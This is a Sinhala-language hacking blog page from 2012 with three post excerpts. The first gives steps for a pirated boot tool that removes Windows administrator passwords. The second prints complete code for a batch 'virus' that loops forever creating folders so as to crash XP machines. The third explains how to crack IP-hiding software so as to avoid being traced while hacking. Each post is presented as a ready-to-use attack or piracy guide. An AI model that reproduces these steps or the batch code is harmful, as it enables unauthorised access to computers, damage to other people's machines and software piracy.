Saturday, May 26, 2012

ADMIN PASSWORD කඩමු ඔන ඔපරෙටින්සිස්ටම් 1කක් (WIN 7,WIN XP,WIN VISTA...)




මම අද ඔයාලට දෙන්න යන්නේ ගොඩක් වටින software එකක්.මේකෙන් ඔයාට ඕනම windows operating system එකක (win xp,win vista,win 7.....) administrator,user password කඩන්න පුලුවන්.කරන්න තියෙන්නේ මෙච්චරයි.මුලින්ම ඔය software(image) එක download කරගන්න.




torrent(9mb)
http://thepiratebay.se/torrent/6525257/ALL_Windows_Password_Remover


ඊට පස්සේ ඔය image එක cd එකකට burn කරගන්න.දෑන් cd එකෙන් computer එක බූට් කරන්න.boot වෙනකොට රුසියන් වචන වගයක් වෑටෙයි ඒවා ගනන් ගන්න එපා ,


ඊලගට ඔයගේ computer එකේ තියෙන windows operating systems ටික වෑටෙයි.windows operating systems ටික කිව්වේ dual boot එහෙම දාලා තියෙන කට්ටියට.ඔයා එතනින් එකක් select කරම operating system එකේ තියෙන user accounts,administrator ඔක්කොම වෑටනෙවා.ඊට පස්සේ ඔයාට කෑමති account එකක් තෝරලා password remove කරන්න පුලුවන්.
ඉහල තියන 4ටො 1ක වගෙ!


1) burn the image to the cd/dvd.
2) then restart the pc.
3) Wait untill it asks any thing from you .
4) Remove the password of the admininstrator.
5) Enjoy..
Read more »

ලොවෙත් නැති පට්ට වයිරස් 1කක්


මම අද ඔයාලට කියල දෙන්න යන virus එක පට්ට බලන්න කරලා එහෙනම් 
මේකන් Xp use කරන machine එකකට ගොඩක් හානිකරන virus එකක් හදන්න පුළුවන් වෙනවා මෙමගින් pc එක crash වෙනු ලබයි .
දැන් අපි බලමු පියවරින් පියවර කරන්නේ කොහොමද කියලා .

මුලින්ම @echo off ලෙසට type කරන්න . 
දැන් enter කර next line එකට යන්න .
දැන් මෙන්න මෙහෙම type කරන්න. : hell 
දැන් කරන්න තියෙන්නේ next Line එකට ගිහින් md %random% ලෙසට type කරන්න. 
දැන් next Line එකට එන්න දැන් මෙන්න මෙහෙම type කරන්න . 
goto hell 
දැන් ඉවරයි දැන් file එක save කරගන්න .bet extention එකත් සමගින් .

අදාල කේතය පහත පරිදිය .

@echo off
: hell
md %random%
goto hell

දැන් එම .bat file එක click කරවිට virus එක infect වෙයි . දැන් XP OS සහිත PC එක crash වෙනු ලබයි .
බලගෙන
Read more »

හැක් කරන්න ඉස්සල්ල IP HIDE කරන්න පුරුදු වෙයල්ලා


Real Hide IP මෘදුකාංගය භාවිතා එක ඔබට අවශ්‍ය ආකාරයට රට රටවල් අතර වෙනස් වෙන්න පුළුවන්, ඒ වගේම, මේ මෘදුකාංගය ක්‍රැක් කරගන්නත් අවශය වෙනවා, පළමුවෙන්ම අපි මේ මෘදුකාංග පහතින් බාගමු.......


ඉහත ලින්ක් එකෙන් බාගත් Real Hide IP මෘදුකාංගය සාමාන්‍ය මෘදුකාංගයක් ඉන්ස්ටෝල් කරන ආකාරයටම ඉන්ස්ටෝල් කරගන්න, ඉන්ස්ටෝල් කරගත් පසු, 

එම මෘදුකාංග විවෘත කරන්න එපා, යම් විදිහකින් විවෘත උවහොත්, System Try එකට ගිහින්, Real Hide IP මෘදුකාංගයේ Icon එක උඩ රයිට් ක්ලික් කර Exit යන්න ක්ලික් කරන්න, පසුව, ඔබ විසින් බාගත් Real Hide IP ෆයිල් එකට යන්න, එතන තියෙනවා, Crack ෆයිල් එකක් ඒ ක්‍රැක් ෆෝල්ඩර් එක විවෘත කර, එහි තිබෙන ෆයිල් එක කොපි කරගන්න, පසුව, මෙම පාත් එකට යන්න, C:\Program Files\RealHideIP කලින් පියවරේදී ඔබ විසින් කොපි කරගත් ෆයිල් එක Paste කරන්න, දැන් Real Hide IP මෘදුකාගය රන් කිරීමට සූදානම්.....Desktop එකෙහි තිබෙන මෙම Real Hide IP අයිකනය මත ඩබල් ක්ලික් කරීමෙන් පහත රූපයේ පරිදි වින්ඩෝ එකක් ලැබෙනවා......


බලන්න මෙහි, Warning! You are currently not hiding your IP! මේ ආකාරයට දකින්න පුළුවන් වෙයි,


අපි තාම IP එක හයිඩ් කරල නැති නිසයි, මේ යකා Warning! එවන්නේ, බලන්න මෙහි තියෙනවා, Check IP Info ලින්ක් එකක් ඒක් ක්ලික් කරලා, දැනට ඔයාගෙ තියෙන අයි.පී එක බලාගන්න පුළුවන්, බලන්න ඒවගේම මෙහි තිබෙනවා, Hide IP බට්න් එකත්, ඒක් ක්ලික් කරලා, ඔයාගේ අයි.පී එක Hide කරගන්න පුළුවන්, ඒ වගේම එයට පහතින් තිබෙන Choose IP Country බ්ට්න් එක ක්ලික් කර ඔබට අවශ්‍ය පරිදි, Country එකක්ද? තෝරා කැනීමේ හැකියාව තිබෙනවා, මේ විදිහට, 



මෙහි තමත් ඔප්ෂන් කිහිපයක් තිබෙනවා, ඒ ටිකක් භාවිතා කර බලන්න, වැදගත් ඔප්ෂන් ටිකක් තිබෙන්නේ.......මේ මෘදුකාංගය දාගෙන බල්න්න ඔය ඉන්ටර්නෙට් ස්පීඩ් එක ස්ලෝ කියන අයට මෙය ටිකක් හොද වෙයි.........
Read more »